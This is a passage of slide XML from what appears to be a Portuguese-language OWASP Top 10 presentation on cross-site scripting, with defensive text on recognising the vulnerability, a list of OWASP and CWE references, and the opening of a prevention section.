                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note que o atacante também pode usar o XSS para anular qualquer defesa automática de CSRF que a aplicação </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>possa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>empregar. Veja o A8 para informações sobre CSRF.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3635896"/>
            <a:ext cx="3390106" cy="2688704"/>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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stou vulnerável?</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Você está vulnerável se não garantir que todas as entradas fornecidas pelos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usuários </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sejam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apropriadamente filtradas, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou você não verifica que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elas sejam seguras </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>via validação de entrada, antes de incluir essa entrada na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>página de saída. Sem o adequado filtro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou validação da saída, tal entrada será tratada como conteúdo ativo no navegador. Se o Ajax está sendo usado para atualizar a página dinamicamente, você está usando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>APIS seguras do JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>? Para APIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inseguras, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>codificação ou validação também </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>devem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usadas. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ferramentas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatizadas podem encontrar alguns problemas de XSS automaticamente. Porém, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aplicação constrói </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> páginas de saída </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>diferentemente e utiliza diferentes interpretadores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>no lado do navegador </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>como JavaScript, ActiveX, Flash, e Silverlight, criando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dificuldades para a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>detecção automática. Portanto, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cobertura completa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exige </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>combinação </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de revisão </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>manual de código </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e teste de invasão, além das abordagens automatizadas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tecnologias Web 2.0, como Ajax, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tornam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o XSS muito mais difícil de detectar via ferramentas automatizadas.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475038" y="6400800"/>
            <a:ext cx="3382962" cy="27432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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referências</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId7"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP DOM based XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>OWASP Cross-Site Scripting Article</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>ESAPI Encoder API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>ASVS: Output Encoding/Escaping Requirements (V6)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>OWASP AntiSamy: Sanitization Library</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Testing Guide: 1st 3 Chapters on Data Validation Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP Code Review Guide: Chapter on XSS Review</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>OWASP XSS Filter Evasion Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId7"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>CWE Entry 79 on Cross-Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475038" y="3635896"/>
            <a:ext cx="3382962" cy="2688704"/>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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como faço para evitar?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evitar XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requer a separação do dado não-confiável </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conteúdo ativo no navegador</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
